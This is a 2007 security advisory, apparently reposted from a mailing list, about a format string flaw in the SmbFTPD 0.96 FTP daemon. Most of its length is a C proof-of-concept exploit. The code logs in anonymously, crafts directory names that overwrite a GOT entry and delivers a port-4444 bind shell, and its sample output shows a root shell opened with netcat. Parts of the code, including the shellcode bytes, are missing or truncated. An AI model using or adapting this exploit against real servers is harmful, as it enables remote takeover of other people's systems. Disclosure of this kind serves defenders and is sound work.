Tuesday, October 02, 2007

[UNIX] SmbFTPD Format String Vulnerability

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SmbFTPD Format String Vulnerability


<http://www.twbsd.org/enu/smbftpd/index.php> SmbFTPD is "a FTP daemon
modified from the FTP daemon of FreeBSD 5.4. Besides keep original FreeBSD
ftpd features, it enhances the user permission control, integrate
configuration files, and more useful features". A format string
vulnerability exist in the SMBDirList-function, dirlist.c, which gets
called when a LIST/NLST is issued. It could be triggered by the way it
outputs recursive listing on directories. It's caused due to misuse of


Vulnerable Systems:
* SmbFTPD version 0.96

Immune Systems:
* SmbFTPD version 0.97

In order for this vulnerability to be exploited, an attacker would need a
valid account (including anonymous) with permission to create directories.
Successful exploitation may allow an attacker to execute arbitrary code.

* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
* - Jerry Illikainen <jerry@debork.se>

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <unistd.h>
#include <stdlib.h>

#define GOT 0x080591d8 // GOT entry for chdir
#define BSS 0x0805a791 // this is where the jumpcode will be written

#define DEBUG(d) if (debug) d;
#define MAXPATH 255
#define BUFSIZE 512

unsigned int debug = 0;

/* bindshell (port 4444) from metasploit.com
* restricted chars = 0x00 0x0a 0x0d */
unsigned char shellcode[] =

void usage (char *arg)
printf("%s [options]\n"
"\t -h <host>\n"
"\t -p <port>\n"
"\t -u <usernmae - default anonymous>\n"
"\t -P <password - default none>\n\n", arg);

int sock (int port, char *host)
struct hostent *h;
struct sockaddr_in addr;
int s;

if ((h = gethostbyname(host)) == NULL)
perror("[!] gethostbyname");
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
perror("[!] socket");

addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *)h->h_addr);
memset(addr.sin_zero, '\0', sizeof addr.sin_zero);
if (connect(s, (struct sockaddr *)&addr, sizeof(struct sockaddr)) == -1)
perror("[!] connect");
return s;

char *s_send (int s, char *m, char *fmt, ...)
static char buf[BUFSIZE];
char str[BUFSIZE];
ssize_t nb;
va_list ap;

va_start(ap, fmt);
vsnprintf(str, BUFSIZE-1, fmt, ap);
if (send(s, str, strlen(str), 0) == -1)
perror("[!] send");
DEBUG(printf("send: %s\n", str));

for (;;)
nb = recv(s, buf, BUFSIZE-1, 0);
buf[nb-1] = '\0';
if (m == NULL)
return buf;
else if (strstr(buf, m) != NULL)
return buf;

void fmt (int *jmpaddr, int *jmpc, int got, char mkd[][MAXPATH])
unsigned char a[4], b[4];
char *dir = mkd[0];
unsigned int i, offset = 1052, start = 256, base = 4;
int *pa = (int *)jmpaddr[0], *pb = (int *)jmpc[0];

for (i = 0; i <= 4; i++)
a[0] = (int)pa >> 24;
a[1] = ((int)pa & 0xff0000) >> 16;
a[2] = ((int)pa & 0xff00) >> 8;
a[3] = (int)pa & 0xff;

b[0] = (int)pb >> 24;
b[1] = ((int)pb & 0xff0000) >> 16;
b[2] = ((int)pb & 0xff00) >> 8;
b[3] = (int)pb & 0xff;

snprintf(dir, MAXPATH-1,
a[3], a[2], a[1], a[0],
a[3] + 1, a[2], a[1], a[0],
a[3] + 2, a[2], a[1], a[0],
a[3] + 3, a[2], a[1], a[0],

b[3] - 12 + start - (base + 4 - (base%4)), offset,
b[2] - b[3] + start, offset + 1,
b[1] - b[2] + start, offset + 2,
b[0] - b[1] + start, offset + 3);

dir = mkd[i];
if (i < 3)
pa = (int *)jmpaddr[i];
pb = (int *)jmpc[i];
} else {
pa = (int *)got;
pb = (int *)jmpaddr[0];

int main (int argc, char **argv)
int s[2], c, port = 21, pasv[5];
unsigned int i;
char *host = NULL, *user = "anonymous", *pass = "", *tmp, *p;
char mkd[5][MAXPATH], sc[2048];
got = GOT,
jmpaddr[] = { BSS, BSS+4, BSS+8 },
jmpc[] = {
0x1234ba66, // mov dx, 0x1234 - 66 ba 34 12
0xc2396658, // pop eax - 58
0xe4fffa75 // cmp ax,dx - 66 39 c2
// jne $-4 - 75 fa
// jmp esp - ff e4

while ((c = getopt(argc, argv, "h:p:u:P:?")) != -1)
switch (c)
case 'h':
host = optarg;
case 'p':
port = atoi(optarg);
case 'u':
user = optarg;
case 'P':
pass = optarg;
case '?':
if (host == NULL)

printf("[+] GOT: %p - .bss (jmpcode): %p\n", (void *)got, (void
fmt(jmpaddr, jmpc, got, mkd);

printf("[+] %s:%d (user: %s pass: %s)\n", host, port, user, pass);
s[0] = sock(port, host);
s_send(s[0], "331", "USER %s\n", user);
p = s_send(s[0], NULL, "PASS %s\n", pass);
if (strstr(p, "230") == NULL)
printf("[!] login failed\n");
p = s_send(s[0], NULL, "MKD %s\nMKD %s\nMKD %s\n", mkd[0], mkd[1],
if (strstr(p, "257") == NULL)
printf("[!] couldn't make directories\n");

printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
for (i = 0; i < 5; i++)
if ((tmp = strtok(NULL, ",")) == NULL)
printf("[!] aborting\n");
pasv[i] = atoi(tmp);
s[1] = sock(pasv[3]*256+pasv[4], host);

printf("[+] writing jumpcode\n");
s_send(s[0], NULL, "NLST -R\n");
s_send(s[0], NULL, "RMD %s\nRMD %s\nRMD %s\n", mkd[0], mkd[1], mkd[2]);

s_send(s[0], NULL, "MKD %s\n", mkd[3]);
printf("[+] PASV\n");
p = s_send(s[0], "227", "PASV\n");
if (strtok(p, ",") == NULL)
for (i = 0; i < 5; i++)
if ((tmp = strtok(NULL, ",")) == NULL)
printf("[!] aborting\n");
pasv[i] = atoi(tmp);
s[1] = sock(pasv[3]*256+pasv[4], host);

memset(sc, 0x90, sizeof(sc)); // some nops before and
memcpy(sc+3, "\x34\x12", 2); // after the "mark"
memcpy(sc+12, shellcode, sizeof(sc)-12);
printf("[+] overwriting GOT entry and sending shellcode\n\n");
s_send(s[0], NULL, "NLST -R%s\n", sc);
return 0;


The information has been provided by <mailto:jerry@debork.se> Jerry


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